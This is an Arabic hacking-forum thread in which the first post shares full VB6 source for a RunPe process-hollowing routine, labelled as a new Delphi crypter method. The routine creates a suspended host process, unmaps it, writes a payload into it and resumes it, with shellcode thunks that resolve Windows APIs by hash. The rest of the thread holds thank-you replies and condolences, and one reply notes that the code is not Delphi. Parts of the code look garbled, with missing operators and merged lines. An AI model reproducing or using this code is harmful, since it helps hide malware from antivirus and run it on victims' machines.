حالة الموضوع:
مغلق
  1. !»°بہًكہًر الہًعہًراقہًي°«!

    !»°بہًكہًر الہًعہًراقہًي°«! нєℓℓ вσуѕ тєαм V • I • P

    الأنتساب:
    ‏7 فبراير 2015
    المشاركات:
    632
    الإعجابات المتلقاة:
    1,410
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق\واسط
    [​IMG]
    كيف الحال اعضاء وزوار عراق تيم انشاء تكونوا بصحه وسلامه

    ------------
    [​IMG]
    شرح اليوم التشفير بالدلفي بطريقه جديده حصريا على ارض الابداع عراق تيم


    التشفير عن طريق استخدام
    RunPe + Invoke


    طبعا لم يتسنى لي وقت لاعمل فديو لاني مستعجل انو هذا اخر موضوع لي لحد شهر الثامن بسب الامتحانات


    اتركم مع الاكواد


    الكود
    كود PHP:
    Declare Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode As CurrencyOptional ByVal lP1 As LongOptional ByVal lP2 As LongOptional ByVal lP3 As LongOptional ByVal lP4 As Long) As LongDeclare Function ExeThunk Lib "user32" Alias "CallWindowProcW" (ByVal Address As AnyOptional ByVal Param1 As LongOptional ByVal Param2 As LongOptional ByVal Param3 As LongOptional ByVal Param4 As Long) As LongDeclare Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef A As AnyOptional ByVal B As Long 1Optional ByVal c As Long 1) As LongPrivate ASM_GETAPIPTR(170)            As BytePrivate ASM_CALLCODE(255)              As BytePrivate sMEMORY(40)                    As BytePrivate sVALUE                        As BytePrivate IMAGE_DOS_HEADER(65)          As BytePrivate IMAGE_NT_HEADERS(256)          As BytePrivate IMAGE_SECTION_HEADER(60)      As BytePrivate PROCESS_INFORMATION(44)        As BytePrivate tCONTEXT(210)                  As BytePrivate STARTUPINFO(16)                As LongPrivate sParams                        As LongPrivate ImageBase                      As LongPrivate hProcess                      As LongPrivate hThread                        As LongPrivate SizeOfImage                    As LongPrivate SizeOfHeaders                  As LongPrivate sEntryPoint                    As LongPrivate VirtualAddress                As LongPrivate sRawDataPoint                  As LongPrivate sRawData                      As LongPrivate Ebx                            As LongPrivate D                              As LongPrivate Z                              As LongPrivate vItem                          As VariantPrivate sSection                      As Integer

    Public Function sInject(ByVal sHost As StringByRef sBytes() As Byte)

    For 
    Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1_&HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)
    sMEMORY(Z) = vItem
    1
    sVALUE 
    200 48
    Next

    Call MoveMemory
    (sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))
    Call MoveMemory(sMulDiv(tCONTEXT(0)), sMulDiv(&H10007), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(0)), sMulDiv(sBytes(0)), &H72)
    Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(0)), sMulDiv(sBytes(sParams)), 256)
    Call MoveMemory(sMulDiv(ImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)
    Call Invoke("KERNEL32""CreateProcessW"0StrPtr(sHost), 00, &H1, &H400sMulDiv(STARTUPINFO(0)), sMulDiv(PROCESS_INFORMATION(0)))
    Call MoveMemory(sMulDiv(hProcess), sMulDiv(PROCESS_INFORMATION(0)), &H1 + &H3)
    Call MoveMemory(sMulDiv(hThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)
    Call Invoke("NTDLL""NtUnmapViewOfSection"hProcessImageBase)
    Call Invoke("KERNEL32""VirtualAllocEx"hProcessImageBaseSizeOfImage, &H3000&, &H40)
    Call Invoke("NTDLL""NtWriteVirtualMemory"hProcessImageBasesMulDiv(sBytes(0)), SizeOfHeadersCLng("0"))
    For 
    0 To sSection 1
    Call MoveMemory
    (sMulDiv(IMAGE_SECTION_HEADER(0)), sMulDiv(sBytes(sParams sVALUE 40& * D)), &H64)
    Call MoveMemory(sMulDiv(VirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H3 + &H4)
    Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
    Call Invoke("NTDLL""NtWriteVirtualMemory"hProcessImageBase VirtualAddresssMulDiv(sBytes(sRawDataPoint)), sRawDataCLng("0"))
    Next
    Call Invoke
    ("NTDLL""NtGetContextThread"hThreadsMulDiv(tCONTEXT(CLng("0"))))          Call Invoke("NTDLL""NtWriteVirtualMemory"hProcessEbx + &H4 + &H1 + &H3sMulDiv(VirtualAddress), &H1 + &H3 + &H2CLng("0"))
    Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(ImageBase sEntryPoint), &H1 + &H3 + &H2)
    Call MoveMemory(sMulDiv(sParams), sMulDiv(tCONTEXT(176)), &H5)
    Call Invoke("NTDLL""NtSetContextThread"hThreadsMulDiv(tCONTEXT(0)))
    Call Invoke("NTDLL""NtResumeThread"hThreadCLng("0"))
    End Function
    Public 
    Sub MoveMemory(ByVal lpDest As LongByVal lpSource As LongByVal cBytes As Long)      ExeThunk sMulDiv(sMEMORY(0)), lpDestlpSourcecBytesCLng("0")  End Sub
    Function Invoke(ByVal sDLL As StringhHash As StringParamArray vParams() As Variant) As Long
    On Error Resume NextDim vItem                      
    As VariantDim sThunk                      As String
    Call PutThunk
    (THUNK_GETAPIPTRASM_GETAPIPTR)
    For 
    Each vItem In vParamssThunk "68" GetLng(vItem) & sThunkNext vItem
    Call PutThunk
    (sThunk "B8" GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _StrPtr(sDLL), gHash(hHash))) & "FFD0C3" sThunkASM_CALLCODE)
    Invoke ExeThunk(VarPtr(ASM_CALLCODE(0)))

    End Function
    Private Function 
    gHash(strHash) As LongOn Error Resume Next
    Dim i          
    As LongDim lResult    As Long
    For 1 To Len(strHash)lResult CallThunk8(-439163333029263.6533@, lResult)lResult lResult Asc(Mid(strHashi1))Next igHash "&H" String(Len(Hex(lResult)), "0") & Hex(lResult)

    End Function
    Private Function 
    GetLng(ByVal lLng As Long) As StringOn Error Resume NextDim lTMP                        As LonglTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000' by Mike D SuttonIf (lLng And &H80&) Then lTMP = lTMP Or &H80000000GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)End Function
    Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)On Error Resume NextDim i                          As LongFor i = 0 To Len(sThunk) - 1 Step 2bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))Next iEnd Sub
    Function THUNK_GETAPIPTR() As StringTHUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"End Function
    الى هنا انتهى الشرح انتمى ان يكون نال اعجباكم دعواتكم بالنجاح لنعود اليكم بمواضيع جديده وحصريا على عراق تيم
    اتركم براعيه الله
    [​IMG]
    امير ايكل


    المعاقب الصدري


    ملخد هكسور


    محمد العراقي


    وفي الاخير رحم الله من قراء سوره الفاتحه على روح اخي وحبيبي علي الصقور

     
  2. Unico Nico

    Unico Nico Developer

    الأنتساب:
    ‏7 مايو 2012
    المشاركات:
    42
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    Algerie,Mascara
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    يعطيك الف عافية #
     
  3. لعنة الهكرز

    لعنة الهكرز Developer

    الأنتساب:
    ‏12 مارس 2013
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    تسلم يدك شاكرين مجهودك​
     
  4. Ghost RAT

    Ghost RAT مراقب عآم

    الأنتساب:
    ‏12 ابريل 2015
    المشاركات:
    475
    الإعجابات المتلقاة:
    162
    نقاط الجائزة:
    43
    الجنس:
    ذكر
    الإقامة:
    IRAQ
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    عشت حبيبي ستمر الله يرحمك عزيزي علاوي
     
  5. !»°بہًكہًر الہًعہًراقہًي°«!

    !»°بہًكہًر الہًعہًراقہًي°«! нєℓℓ вσуѕ тєαм V • I • P

    الأنتساب:
    ‏7 فبراير 2015
    المشاركات:
    632
    الإعجابات المتلقاة:
    1,410
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق\واسط
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    نورتو اصدقائي تحياتي للجميع
     
  6. علي الواسطي

    علي الواسطي DeveloPer Plus

    الأنتساب:
    ‏13 يناير 2015
    المشاركات:
    158
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    18
    الوظيفة:
    طالب
    الإقامة:
    iraq
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    مببببببدع عاشت ايدك
    .
    .
    .
    الله يرحمه ويدخله فسيح جناته :(
     
  7. !»°بہًكہًر الہًعہًراقہًي°«!

    !»°بہًكہًر الہًعہًراقہًي°«! нєℓℓ вσуѕ тєαм V • I • P

    الأنتساب:
    ‏7 فبراير 2015
    المشاركات:
    632
    الإعجابات المتلقاة:
    1,410
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق\واسط

    تسلم خويه ويرحم اموات المسلمين جميعا
     
  8. Girl - SilenT

    Girl - SilenT <span style="font-weight: bold; text-shadow: #BBBB مشرفات المنتدى

    الأنتساب:
    ‏1 ابريل 2015
    المشاركات:
    236
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    عاشت ايدك ع موضوع استمر يامبدع


    تحياتي


    :{1!}:
     
  9. Someone

    Someone Developer

    الأنتساب:
    ‏15 أغسطس 2014
    المشاركات:
    24
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    رد: التشفير بالدلفي بطريقه جديده عن طريق استخدام RunPe + Invoke

    هذا مو دلفي
    oh god why.
     
  10. !»°بہًكہًر الہًعہًراقہًي°«!

    !»°بہًكہًر الہًعہًراقہًي°«! нєℓℓ вσуѕ тєαм V • I • P

    الأنتساب:
    ‏7 فبراير 2015
    المشاركات:
    632
    الإعجابات المتلقاة:
    1,410
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق\واسط
    نورتي الموضوع اختي
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة